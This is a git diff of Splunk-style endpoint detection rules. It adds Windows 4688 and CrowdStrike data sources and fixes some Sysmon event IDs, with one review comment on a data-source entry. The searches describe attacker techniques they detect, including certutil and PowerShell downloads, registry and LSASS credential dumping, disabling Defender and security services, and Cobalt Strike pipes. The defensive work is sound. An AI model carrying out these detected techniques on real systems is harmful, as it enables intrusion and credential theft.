@@ -15,6 +15,8 @@ description: The following analytic detects the use of commands to add or set ex
interference from Windows Defender.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process = "*Add-MpPreference
*" OR Processes.process = "*Set-MpPreference *") AND Processes.process="*-exclusion*"
diff --git a/detections/endpoint/allow_file_and_printing_sharing_in_firewall.yml b/detections/endpoint/allow_file_and_printing_sharing_in_firewall.yml
index 1a2a11b37c..5a2ac8f40d 100644
--- a/detections/endpoint/allow_file_and_printing_sharing_in_firewall.yml
+++ b/detections/endpoint/allow_file_and_printing_sharing_in_firewall.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the modification of firewall setting
attack.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_netsh` Processes.process=
"*firewall*" Processes.process= "*group=\"File and Printer Sharing\"*" Processes.process="*enable=Yes*"
diff --git a/detections/endpoint/allow_inbound_traffic_by_firewall_rule_registry.yml b/detections/endpoint/allow_inbound_traffic_by_firewall_rule_registry.yml
index ae793efaed..7ad7cf43f9 100644
--- a/detections/endpoint/allow_inbound_traffic_by_firewall_rule_registry.yml
+++ b/detections/endpoint/allow_inbound_traffic_by_firewall_rule_registry.yml
@@ -14,7 +14,7 @@ description: The following analytic detects suspicious modifications to firewall
leading to further exploitation, data exfiltration, or lateral movement within the
network.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE (Registry.registry_path= "*\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\*"
diff --git a/detections/endpoint/allow_network_discovery_in_firewall.yml b/detections/endpoint/allow_network_discovery_in_firewall.yml
index 07192c9714..e56d04a430 100644
--- a/detections/endpoint/allow_network_discovery_in_firewall.yml
+++ b/detections/endpoint/allow_network_discovery_in_firewall.yml
@@ -15,6 +15,8 @@ description: The following analytic detects a suspicious modification to the fir
ransomware attack.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_netsh` Processes.process=
"*firewall*" Processes.process= "*group=\"Network Discovery\"*" Processes.process="*enable*"
diff --git a/detections/endpoint/allow_operation_with_consent_admin.yml b/detections/endpoint/allow_operation_with_consent_admin.yml
index 1d37f3adf4..02a978d199 100644
--- a/detections/endpoint/allow_operation_with_consent_admin.yml
+++ b/detections/endpoint/allow_operation_with_consent_admin.yml
@@ -15,7 +15,7 @@ description: The following analytic detects a registry modification that allows
administrative access and control over the compromised machine, posing a severe
security risk.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE (Registry.registry_path= "*\\Microsoft\\Windows\\CurrentVersion\\Policies\\System*"
diff --git a/detections/endpoint/anomalous_usage_of_7zip.yml b/detections/endpoint/anomalous_usage_of_7zip.yml
index 73420cfda5..37ed56590f 100644
--- a/detections/endpoint/anomalous_usage_of_7zip.yml
+++ b/detections/endpoint/anomalous_usage_of_7zip.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of 7z.exe, a 7-Zip uti
sensitive information and potentially leading to further system exploitation.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name
IN ("rundll32.exe", "dllhost.exe") Processes.process_name=*7z* by Processes.dest
diff --git a/detections/endpoint/any_powershell_downloadfile.yml b/detections/endpoint/any_powershell_downloadfile.yml
index 8731471376..5455e24e79 100644
--- a/detections/endpoint/any_powershell_downloadfile.yml
+++ b/detections/endpoint/any_powershell_downloadfile.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of PowerShell's `DownloadFil
context.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_powershell` Processes.process=*DownloadFile*
by Processes.dest Processes.user Processes.parent_process Processes.process_name
diff --git a/detections/endpoint/any_powershell_downloadstring.yml b/detections/endpoint/any_powershell_downloadstring.yml
index f811a1c48b..7b8a99521f 100644
--- a/detections/endpoint/any_powershell_downloadstring.yml
+++ b/detections/endpoint/any_powershell_downloadstring.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of PowerShell's `DownloadStr
affected system.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_powershell` Processes.process=*.DownloadString* by
Processes.dest Processes.user Processes.parent_process Processes.parent_process_name
diff --git a/detections/endpoint/attacker_tools_on_endpoint.yml b/detections/endpoint/attacker_tools_on_endpoint.yml
index d5be08b6a2..8a7e564e20 100644
--- a/detections/endpoint/attacker_tools_on_endpoint.yml
+++ b/detections/endpoint/attacker_tools_on_endpoint.yml
@@ -9,6 +9,8 @@ description: |-
The following analytic detects the execution of tools commonly exploited by cybercriminals, such as those used for unauthorized access, network scanning, or data exfiltration. It leverages process activity data from Endpoint Detection and Response (EDR) agents, focusing on known attacker tool names. This activity is significant because it serves as an early warning system for potential security incidents, enabling prompt response. If confirmed malicious, this activity could lead to unauthorized access, data theft, or further network compromise, posing a severe threat to the organization's security infrastructure.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime values(Processes.process) as process values(Processes.parent_process)
as parent_process from datamodel=Endpoint.Processes where Processes.dest!=unknown
diff --git a/detections/endpoint/attempt_to_add_certificate_to_untrusted_store.yml b/detections/endpoint/attempt_to_add_certificate_to_untrusted_store.yml
index be0059ec9e..4b9f66efaa 100644
--- a/detections/endpoint/attempt_to_add_certificate_to_untrusted_store.yml
+++ b/detections/endpoint/attempt_to_add_certificate_to_untrusted_store.yml
@@ -9,6 +9,8 @@ description: |-
The following analytic detects attempts to add a certificate to the untrusted certificate store using the 'certutil -addstore' command. It leverages process activity and command-line arguments from Endpoint Detection and Response (EDR) logs mapped to the Splunk `Processes` data model. This activity is significant as it may indicate an attacker trying to disable security tools to gain unauthorized access. If confirmed malicious, this could lead to the compromise of system security, allowing attackers to bypass defenses and potentially escalate privileges or persist in the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime values(Processes.process)
as process max(_time) as lastTime from datamodel=Endpoint.Processes where `process_certutil`
(Processes.process=*-addstore*) by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/attempt_to_stop_security_service.yml b/detections/endpoint/attempt_to_stop_security_service.yml
index d1b6bad955..6a3c54360b 100644
--- a/detections/endpoint/attempt_to_stop_security_service.yml
+++ b/detections/endpoint/attempt_to_stop_security_service.yml
@@ -9,6 +9,8 @@ description: |-
The following analytic detects attempts to stop security-related services on an endpoint, which may indicate malicious activity. It leverages data from Endpoint Detection and Response (EDR) agents, specifically searching for processes involving the "sc.exe" command with the "stop" parameter. This activity is significant because disabling security services can undermine the organization's security posture, potentially leading to unauthorized access, data exfiltration, or further attacks like malware installation or privilege escalation. If confirmed malicious, this behavior could compromise the endpoint and the entire network, necessitating immediate investigation and response.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` values(Processes.process) as process
min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
where `process_net` OR Processes.process_name = sc.exe Processes.process="* stop
diff --git a/detections/endpoint/attempted_credential_dump_from_registry_via_reg_exe.yml b/detections/endpoint/attempted_credential_dump_from_registry_via_reg_exe.yml
index 66c040aee5..0ef5debd5a 100644
--- a/detections/endpoint/attempted_credential_dump_from_registry_via_reg_exe.yml
+++ b/detections/endpoint/attempted_credential_dump_from_registry_via_reg_exe.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of reg.exe with parame
the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name=reg*
OR Processes.process_name=cmd* Processes.process=*save* (Processes.process=*HKEY_LOCAL_MACHINE\\Security*
diff --git a/detections/endpoint/auto_admin_logon_registry_entry.yml b/detections/endpoint/auto_admin_logon_registry_entry.yml
index c11c8a7094..45f2adea93 100644
--- a/detections/endpoint/auto_admin_logon_registry_entry.yml
+++ b/detections/endpoint/auto_admin_logon_registry_entry.yml
@@ -15,7 +15,7 @@ description: The following analytic detects a suspicious registry modification t
their operations, potentially leading to widespread network encryption and data
loss.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE (Registry.registry_path= "*SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon*"
diff --git a/detections/endpoint/batch_file_write_to_system32.yml b/detections/endpoint/batch_file_write_to_system32.yml
index b7907de2c7..6f0cad7956 100644
--- a/detections/endpoint/batch_file_write_to_system32.yml
+++ b/detections/endpoint/batch_file_write_to_system32.yml
@@ -14,7 +14,7 @@ description: The following analytic detects the creation of a batch file (.bat)
to execute arbitrary commands with elevated privileges, potentially compromising
the entire system.
data_source:
-- Sysmon Event ID 1
+- Sysmon EventID 1 AND Sysmon EventID 11
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
where Processes.process_name=* by _time span=1h Processes.process_guid Processes.process_name
Processes.dest Processes.user | `drop_dm_object_name(Processes)` | join process_guid
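Review bot: The replaced data_source line folds two sources into a single list item, `- Sysmon EventID 1 AND Sysmon EventID 11`, while every other hunk in this diff keeps one source per item (the `Windows Event Log Security 4688` and `CrowdStrike ProcessRollup2` additions, for example). If contentctl resolves each entry against a named data source definition, this combined string is unlikely to match either one and will either fail validation or silently map to nothing. Split it into two items: `- Sysmon EventID 1` followed by `- Sysmon EventID 11`. That also matches the search, which appears to join process-creation data with a second dataset on process_guid; the search body continues past the hunk.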
diff --git a/detections/endpoint/bcdedit_command_back_to_normal_mode_boot.yml b/detections/endpoint/bcdedit_command_back_to_normal_mode_boot.yml
index e6e58b0986..adaef8948f 100644
--- a/detections/endpoint/bcdedit_command_back_to_normal_mode_boot.yml
+++ b/detections/endpoint/bcdedit_command_back_to_normal_mode_boot.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of a suspicious `bcded
leading to further system compromise and data encryption.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name = bcdedit.exe
Processes.process="*/deletevalue*" Processes.process="*{current}*" Processes.process="*safeboot*"
diff --git a/detections/endpoint/bcdedit_failure_recovery_modification.yml b/detections/endpoint/bcdedit_failure_recovery_modification.yml
index fe7dbc22e9..d49abaada7 100644
--- a/detections/endpoint/bcdedit_failure_recovery_modification.yml
+++ b/detections/endpoint/bcdedit_failure_recovery_modification.yml
@@ -15,6 +15,8 @@ description: The following analytic detects modifications to the Windows error r
complicate remediation.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name = bcdedit.exe
Processes.process="*recoveryenabled*" (Processes.process="* no*") by Processes.process_name
diff --git a/detections/endpoint/bits_job_persistence.yml b/detections/endpoint/bits_job_persistence.yml
index e67abbaf5b..36a409ddd5 100644
--- a/detections/endpoint/bits_job_persistence.yml
+++ b/detections/endpoint/bits_job_persistence.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of `bitsadmin.exe` to schedu
further investigation and potential remediation.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_bitsadmin` Processes.process
IN (*create*, *addfile*, *setnotifyflags*, *setnotifycmdline*, *setminretrydelay*,
diff --git a/detections/endpoint/bitsadmin_download_file.yml b/detections/endpoint/bitsadmin_download_file.yml
index 384bdf2eb3..8846f32618 100644
--- a/detections/endpoint/bitsadmin_download_file.yml
+++ b/detections/endpoint/bitsadmin_download_file.yml
@@ -16,6 +16,8 @@ description: The following analytic detects the use of `bitsadmin.exe` with the
associated artifacts.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_bitsadmin` Processes.process
IN ("*transfer*", "*addfile*") by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml b/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml
index f7617cb6e4..01481cc3e8 100644
--- a/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml
+++ b/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of certutil.exe to download
and unauthorized data access.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_certutil` (Processes.process=*urlcache*
Processes.process=*split*) OR Processes.process=*urlcache* by Processes.dest Processes.user
diff --git a/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml b/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml
index ab76a73504..8e754fd5f8 100644
--- a/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml
+++ b/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml
@@ -15,6 +15,8 @@ description: 'The following analytic detects the use of `certutil.exe` to downlo
compromise of the system.'
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_certutil` (Processes.process=*verifyctl*
Processes.process=*split*) OR Processes.process=*verifyctl* by Processes.dest Processes.user
diff --git a/detections/endpoint/certutil_exe_certificate_extraction.yml b/detections/endpoint/certutil_exe_certificate_extraction.yml
index a546826f0b..c8dde3208e 100644
--- a/detections/endpoint/certutil_exe_certificate_extraction.yml
+++ b/detections/endpoint/certutil_exe_certificate_extraction.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the use of certutil.exe with argu
escalation within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name=certutil.exe
Processes.process = "*-exportPFX*" by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/certutil_with_decode_argument.yml b/detections/endpoint/certutil_with_decode_argument.yml
index cdd65c8aa1..f4c25f7b0a 100644
--- a/detections/endpoint/certutil_with_decode_argument.yml
+++ b/detections/endpoint/certutil_with_decode_argument.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of CertUtil.exe with the 'de
further system compromise, and potential data exfiltration.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_certutil` Processes.process=*decode*
by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name
diff --git a/detections/endpoint/change_default_file_association.yml b/detections/endpoint/change_default_file_association.yml
index 4c9eae831c..7dd89984e1 100644
--- a/detections/endpoint/change_default_file_association.yml
+++ b/detections/endpoint/change_default_file_association.yml
@@ -14,7 +14,7 @@ description: The following analytic detects suspicious registry modifications th
malicious, this technique can enable attackers to persist on the compromised host
and execute further malicious commands, posing a severe threat to the environment.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime
max(_time) as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path
diff --git a/detections/endpoint/change_to_safe_mode_with_network_config.yml b/detections/endpoint/change_to_safe_mode_with_network_config.yml
index cd7079ba17..ccf84c1fe2 100644
--- a/detections/endpoint/change_to_safe_mode_with_network_config.yml
+++ b/detections/endpoint/change_to_safe_mode_with_network_config.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of a suspicious `bcded
and continue their malicious activities.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name = bcdedit.exe
Processes.process="*/set*" Processes.process="*{current}*" Processes.process="*safeboot*"
diff --git a/detections/endpoint/chcp_command_execution.yml b/detections/endpoint/chcp_command_execution.yml
index f4b3a5c1e9..fb247f8443 100644
--- a/detections/endpoint/chcp_command_execution.yml
+++ b/detections/endpoint/chcp_command_execution.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of the chcp.exe applic
system compromise and data exfiltration.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name=chcp.com
Processes.parent_process_name = cmd.exe (Processes.parent_process=*/c* OR Processes.parent_process=*/k*)
diff --git a/detections/endpoint/check_elevated_cmd_using_whoami.yml b/detections/endpoint/check_elevated_cmd_using_whoami.yml
index e2cfedcecb..f9d98c1330 100644
--- a/detections/endpoint/check_elevated_cmd_using_whoami.yml
+++ b/detections/endpoint/check_elevated_cmd_using_whoami.yml
@@ -14,6 +14,8 @@ description: The following analytic identifies the execution of the 'whoami' com
leading to further privilege escalation or persistence within the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process = "*whoami*"
Processes.process = "*/group*" Processes.process = "* find *" Processes.process
diff --git a/detections/endpoint/child_processes_of_spoolsv_exe.yml b/detections/endpoint/child_processes_of_spoolsv_exe.yml
index 2403887364..af335b10da 100644
--- a/detections/endpoint/child_processes_of_spoolsv_exe.yml
+++ b/detections/endpoint/child_processes_of_spoolsv_exe.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies child processes spawned by spools
privileges, and potentially compromise the entire system.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count values(Processes.process_name)
as process_name values(Processes.process) as process min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=spoolsv.exe
diff --git a/detections/endpoint/clear_unallocated_sector_using_cipher_app.yml b/detections/endpoint/clear_unallocated_sector_using_cipher_app.yml
index 90c1dd8e9a..e643ff1945 100644
--- a/detections/endpoint/clear_unallocated_sector_using_cipher_app.yml
+++ b/detections/endpoint/clear_unallocated_sector_using_cipher_app.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of `cipher.exe` with t
critical data, thereby complicating the investigation and remediation process.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "cipher.exe"
Processes.process = "*/w:*" by Processes.parent_process_name Processes.parent_process
diff --git a/detections/endpoint/clop_common_exec_parameter.yml b/detections/endpoint/clop_common_exec_parameter.yml
index 197e374c96..f22c836b05 100644
--- a/detections/endpoint/clop_common_exec_parameter.yml
+++ b/detections/endpoint/clop_common_exec_parameter.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of CLOP ransomware
highlighting the need for immediate investigation and response.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name != "*temp.dat*"
Processes.process = "*runrun*" OR Processes.process = "*temp.dat*" by Processes.dest
diff --git a/detections/endpoint/cmd_carry_out_string_command_parameter.yml b/detections/endpoint/cmd_carry_out_string_command_parameter.yml
index f0a0066b9c..4566f7c623 100644
--- a/detections/endpoint/cmd_carry_out_string_command_parameter.yml
+++ b/detections/endpoint/cmd_carry_out_string_command_parameter.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the use of `cmd.exe /c` to execute c
code execution, privilege escalation, or persistence within the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_cmd` AND Processes.process="*
/c*" by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process
diff --git a/detections/endpoint/cmd_echo_pipe___escalation.yml b/detections/endpoint/cmd_echo_pipe___escalation.yml
index 7a570dfb50..7f4267b42a 100644
--- a/detections/endpoint/cmd_echo_pipe___escalation.yml
+++ b/detections/endpoint/cmd_echo_pipe___escalation.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the use of named-pipe impersonati
enabling further compromise and persistence within the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_cmd` OR Processes.process=*%comspec%*
(Processes.process=*echo* AND Processes.process=*pipe*) by Processes.dest Processes.user
diff --git a/detections/endpoint/cmdline_tool_not_executed_in_cmd_shell.yml b/detections/endpoint/cmdline_tool_not_executed_in_cmd_shell.yml
index de29f57aea..eab3df9433 100644
--- a/detections/endpoint/cmdline_tool_not_executed_in_cmd_shell.yml
+++ b/detections/endpoint/cmdline_tool_not_executed_in_cmd_shell.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies instances where `ipconfig.exe`, `
within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name = "ipconfig.exe"
OR Processes.process_name = "systeminfo.exe" OR Processes.process_name = "net.exe"
diff --git a/detections/endpoint/cobalt_strike_named_pipes.yml b/detections/endpoint/cobalt_strike_named_pipes.yml
index 7c5eab3db4..b719d5f91b 100644
--- a/detections/endpoint/cobalt_strike_named_pipes.yml
+++ b/detections/endpoint/cobalt_strike_named_pipes.yml
@@ -14,7 +14,7 @@ description: 'The following analytic detects the use of default or publicly know
this could indicate an active Cobalt Strike beacon, leading to unauthorized access,
data exfiltration, or further lateral movement within the network.'
data_source:
-- Sysmon EventID 17
+- Sysmon EventID 17
- Sysmon EventID 18
search: '`sysmon` EventID=17 OR EventID=18 PipeName IN (\\msagent_*, \\DserNamePipe*,
\\srvsvc_*, \\postex_*, \\status_*, \\MSSE-*, \\spoolss_*, \\win_svc*, \\ntsvcs*,
diff --git a/detections/endpoint/conti_common_exec_parameter.yml b/detections/endpoint/conti_common_exec_parameter.yml
index 0e6b843a59..8d5d490ba6 100644
--- a/detections/endpoint/conti_common_exec_parameter.yml
+++ b/detections/endpoint/conti_common_exec_parameter.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of suspicious command-
downtime, and potential ransom demands.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process = "*-m local*"
OR Processes.process = "*-m net*" OR Processes.process = "*-m all*" OR Processes.process
diff --git a/detections/endpoint/control_loading_from_world_writable_directory.yml b/detections/endpoint/control_loading_from_world_writable_directory.yml
index c5cfb4a44c..7347951756 100644
--- a/detections/endpoint/control_loading_from_world_writable_directory.yml
+++ b/detections/endpoint/control_loading_from_world_writable_directory.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies instances of control.exe loading
over the affected system, leading to further compromise.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=control.exe
OR Processes.original_file_name=CONTROL.EXE) AND Processes.process IN ("*\\appdata\\*",
diff --git a/detections/endpoint/create_local_admin_accounts_using_net_exe.yml b/detections/endpoint/create_local_admin_accounts_using_net_exe.yml
index bf7a421242..4264233edf 100644
--- a/detections/endpoint/create_local_admin_accounts_using_net_exe.yml
+++ b/detections/endpoint/create_local_admin_accounts_using_net_exe.yml
@@ -9,6 +9,8 @@ description: |-
The following analytic detects the creation of local administrator accounts using the net.exe command. It leverages Endpoint Detection and Response (EDR) data to identify processes named net.exe or net1.exe with the "/add" parameter and keywords related to administrator accounts. This activity is significant as it may indicate an attacker attempting to gain persistent access or escalate privileges. If confirmed malicious, this could lead to unauthorized access, data theft, or further system compromise. Review the process details, user context, and related artifacts to determine the legitimacy of the activity.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count values(Processes.user) as
user values(Processes.parent_process) as parent_process values(parent_process_name)
as parent_process_name min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
diff --git a/detections/endpoint/create_or_delete_windows_shares_using_net_exe.yml b/detections/endpoint/create_or_delete_windows_shares_using_net_exe.yml
index 73242cd06a..1e5abbd05b 100644
--- a/detections/endpoint/create_or_delete_windows_shares_using_net_exe.yml
+++ b/detections/endpoint/create_or_delete_windows_shares_using_net_exe.yml
@@ -9,6 +9,8 @@ description: |-
The following analytic detects the creation or deletion of Windows shares using the net.exe command. It leverages Endpoint Detection and Response (EDR) data to identify processes involving net.exe with actions related to share management. This activity is significant because it may indicate an attacker attempting to manipulate network shares for malicious purposes, such as data exfiltration, malware distribution, or establishing persistence. If confirmed malicious, this activity could lead to unauthorized access to sensitive information, service disruption, or malware introduction. Immediate investigation is required to determine the intent and mitigate potential threats.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count values(Processes.user) as
user values(Processes.parent_process) as parent_process min(_time) as firstTime
max(_time) as lastTime from datamodel=Endpoint.Processes where `process_net` by
diff --git a/detections/endpoint/creation_of_lsass_dump_with_taskmgr.yml b/detections/endpoint/creation_of_lsass_dump_with_taskmgr.yml
index 28aa70a853..b1c933f75b 100644
--- a/detections/endpoint/creation_of_lsass_dump_with_taskmgr.yml
+++ b/detections/endpoint/creation_of_lsass_dump_with_taskmgr.yml
@@ -13,7 +13,7 @@ description: The following analytic detects the creation of an lsass.exe process
an attacker could use the lsass dump to extract credentials and escalate privileges,
potentially compromising the entire network.
data_source:
-- Sysmon EventID 1
+- Sysmon EventID 11
search: '`sysmon` EventID=11 process_name=taskmgr.exe TargetFilename=*lsass*.dmp |
stats count min(_time) as firstTime max(_time) as lastTime by dest, object_category,
process_name, TargetFilename | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`
diff --git a/detections/endpoint/creation_of_shadow_copy.yml b/detections/endpoint/creation_of_shadow_copy.yml
index 7eceba4476..8f8a9ba2d2 100644
--- a/detections/endpoint/creation_of_shadow_copy.yml
+++ b/detections/endpoint/creation_of_shadow_copy.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the creation of shadow copies using
risk to the integrity and confidentiality of the system.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=vssadmin.exe
Processes.process=*create* Processes.process=*shadow*) OR (Processes.process_name=wmic.exe
diff --git a/detections/endpoint/creation_of_shadow_copy_with_wmic_and_powershell.yml b/detections/endpoint/creation_of_shadow_copy_with_wmic_and_powershell.yml
index 95a7ef8d8d..70575f4245 100644
--- a/detections/endpoint/creation_of_shadow_copy_with_wmic_and_powershell.yml
+++ b/detections/endpoint/creation_of_shadow_copy_with_wmic_and_powershell.yml
@@ -9,6 +9,8 @@ description: |-
